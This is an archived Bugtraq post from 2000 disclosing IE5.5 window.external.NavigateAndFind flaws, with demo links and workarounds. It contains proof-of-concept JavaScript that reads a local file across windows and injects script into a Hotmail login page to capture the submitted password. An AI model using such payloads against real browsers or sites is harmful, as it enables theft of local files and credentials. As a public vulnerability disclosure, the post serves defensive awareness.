Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

IE5.5 window.externalNavigateAndFind security vulnerability....

From: Alp Sinan <alp () UK2 NET>
Date: Sat, 30 Sep 2000 18:49:41 -0000
Multiple security vulnerabilities found in 
window.external.NavigateAndFind function in IE5.5...
After the most recent patches applied the 
vulnerabilities seem to persist.. Actually there is no 
current issues discussed at microsft website...
Microsoft has been notified about the problem via 
email.. Until now there is no response appearing.
I wanted to inform security concerned people about 
the problem..

Vulnerability 1: window.external.NavigateAndFind 
function can Access local files provided that the local 
file name and path is known...

the code :(the I in the script tag replaced with 
lowercase)

<A href="javascr!pt:LinkClicked()">Show local file's 
Content</A>
<SCRiPT>
function LinkClicked()
{
b=window.open("file://C:/test.txt","local")
setTimeout('Sniff()',1000);

}
function Sniff(){
 window.external.NavigateAndFind("javascript:alert
(document.body.innerText);","b","local");
}

</SCRiPT>
demonstration:
http://www.horoznet.com/AlpSinan/navAL.htm


vulnerability 2.window.external.NavigateAndFind 
function can access other windows DOM.
editing the opened windows content, therefore code 
injection, possible.
the code :

<A href="javascript:LinkClicked()">Go to Hotmail </A>
<scrIpt>
function LinkClicked()
{
a=window.open
("http://lc2.law5.hotmail.passport.com/cgi-
bin/login","new")
setTimeout('Spoof()',20000);// you may modify the 
timeout....

}
function Spoof(){
 window.external.NavigateAndFind
("javascript:document.write
(''+document.body.outerHTML+'<scrIpt>document.pa
sswordform.onsubmit=ShowPass;function 
ShowPass(){alert(\"Your Password is:  \n 
\"+document.passwordform.passwd.value)};window.f
ocus();</sc'+'rIpt>');alert('The code has been injected 
right now.');","a","new");
}
</scrIpt>
demonstration:
http://www.horoznet.com/AlpSinan/navCI.htm

vulnerability 3.
IE5.5 can execute the plain text files' javascript or 
VBscript content...
demonstration:
http://www.horoznet.com/AlpSinan/execlocal.htm

Precautions or workarounds might be disabling 
javascript or using caution while clicking the links in 
untrusted webpages as well as popup windows. 

Alp Sinan
Previous By Date Next
Previous By Thread Next

Current thread: